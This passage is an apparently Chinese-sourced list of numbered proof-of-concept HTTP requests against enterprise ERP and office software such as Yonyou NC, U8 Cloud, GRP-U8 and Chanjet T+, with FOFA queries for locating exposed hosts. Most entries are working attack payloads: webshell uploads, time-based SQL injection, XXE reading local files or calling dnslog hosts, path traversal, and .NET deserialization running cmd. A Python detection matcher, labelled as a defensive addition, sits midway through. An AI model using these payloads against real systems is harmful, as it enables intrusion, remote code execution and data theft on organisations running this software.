User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The uploaded part is a harmless .txt; the fname field names the server-side destination, which is what turns it into a .jsp under the web root.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
8 N) y7 _4 d8 a8 J% j& V6 G! H, a

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

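Defensive check, added here and not part of the original post or of any product named in it: a small signature matcher over raw HTTP request text for the request families in this list (the `${jndi:...}` lookup at the top of the section, the fastjson `@type` payload in item 23, the ObjectDataProvider/Process gadget in items 54 and 56, the `waitfor delay` / `DBMS_PIPE.RECEIVE_MESSAGE` time-based SQL injection probes, the `<!ENTITY ... SYSTEM` XXE bodies, script uploads via multipart `filename=`, and `../` traversal). The sample requests are constructed for the test; hosts and paths in them are placeholders, and decoding the whole request twice is a simplification noted in the code.

```python
"""Signature matcher for the request families catalogued in this list.

Added defensive example; not part of the original post and not code from
any of the products named here. Sample requests are constructed, with
placeholder hosts and paths, purely to exercise the rules offline.
"""
import re
from urllib.parse import unquote_plus

# One rule per family seen in the list, applied to the decoded request text.
RULES = [
    # Log4j-style lookups inside JSON or form fields ("${jndi:...}")
    ("jndi_lookup", re.compile(r"\$\{jndi:", re.I)),
    # fastjson autotype: "@type" naming fastjson itself or java.net.URL (item 23)
    ("fastjson_autotype",
     re.compile(r'"@type"\s*:\s*"(?:com\.alibaba\.fastjson|java\.net\.URL)', re.I)),
    # .NET ObjectDataProvider -> Process gadget chain (items 54 and 56)
    ("dotnet_objectdataprovider",
     re.compile(r"System\.Windows\.Data\.ObjectDataProvider|System\.Diagnostics\.Process", re.I)),
    # Time-based SQL injection: MSSQL WAITFOR DELAY, Oracle DBMS_PIPE (items 26-34, 41-46, 51)
    ("sqli_time_based",
     re.compile(r"\bwaitfor\s+delay\b|DBMS_PIPE\.RECEIVE_MESSAGE", re.I)),
    # XXE: external entity or external DTD declaration (items 36-40, 45)
    ("xxe_external_entity",
     re.compile(r"<!(?:ENTITY\s+(?:%\s*)?\w+|DOCTYPE\s+\w+)\s+SYSTEM", re.I)),
    # Multipart upload whose filename is a server-side script (items 24, 28, 35, 48, 49)
    ("executable_upload",
     re.compile(r'filename="[^"]*\.(?:jspx?|php\d?|aspx?|ashx)\s*"', re.I)),
    # Directory traversal in a path or form field (items 24, 35, 47, 53)
    ("path_traversal",
     re.compile(r"\.\.[/\\]|[/\\]webapps[/\\]", re.I)),
]


def decode_request(raw: str) -> str:
    """Return the request text with URL encoding removed.

    Decoding runs twice because several entries in the list carry encoded
    separators (%2F) or quotes (%27); '+' becomes a space so that
    "waitfor+delay" matches the plain-text rule. A production filter would
    decode per content type; decoding everything is a deliberate
    simplification for this example.
    """
    return unquote_plus(unquote_plus(raw))


def classify_request(raw: str) -> list[str]:
    """Names of every rule that fires on one raw HTTP request."""
    text = decode_request(raw)
    return [name for name, rx in RULES if rx.search(text)]


def scan_requests(requests: dict[str, str]) -> dict[str, list[str]]:
    """Classify a batch of captured requests keyed by an identifier."""
    return {key: classify_request(raw) for key, raw in requests.items()}


# Constructed samples (placeholder hosts/paths): one per family plus a benign login.
SAMPLES = {
    "jndi": 'POST /login HTTP/1.1\nHost: h\nContent-Type: application/json\n\n'
            '{"loginName":"${jndi:ldap://example.invalid/a}"}',
    "fastjson": 'POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1\nHost: h\n\n'
                '{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                '{"@type":"java.net.URL","val":"http://example.invalid"}}""}',
    "sqli_oracle": "GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1\n"
                   "Host: h\n\n",
    "sqli_mssql_encoded": "GET /service/~iufo/a?query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1\n"
                          "Host: h\n\n",
    "xxe": 'POST /uapws/soapFormat.ajax HTTP/1.1\nHost: h\n'
           'Content-Type: application/x-www-form-urlencoded\n\n'
           'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>',
    "upload": 'POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1\nHost: h\n'
              'Content-Type: multipart/form-data; boundary=b\n\n--b\n'
              'Content-Disposition: form-data; name="upload"; filename="x.jsp"\n\n'
              '<%out.println(1);%>\n--b--',
    "gadget": 'POST /tplus/ajaxpro/a.ashx?method=GetStoreWarehouseByStore HTTP/1.1\nHost: h\n\n'
              '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework",'
              '"MethodName":"Start"}}',
    "traversal": "GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1\nHost: h\n\n",
    "benign": 'POST /login HTTP/1.1\nHost: h\nContent-Type: application/json\n\n'
              '{"loginName":"alice","password":"correct horse"}',
}

if __name__ == "__main__":
    for key, hits in scan_requests(SAMPLES).items():
        print(f"{key:20s} {hits or '-'}")
```

Each rule is keyed to the request shapes in this list rather than to a product, so a hit is a reason to pull the full request and the response timing, not proof of exploitation.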
55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
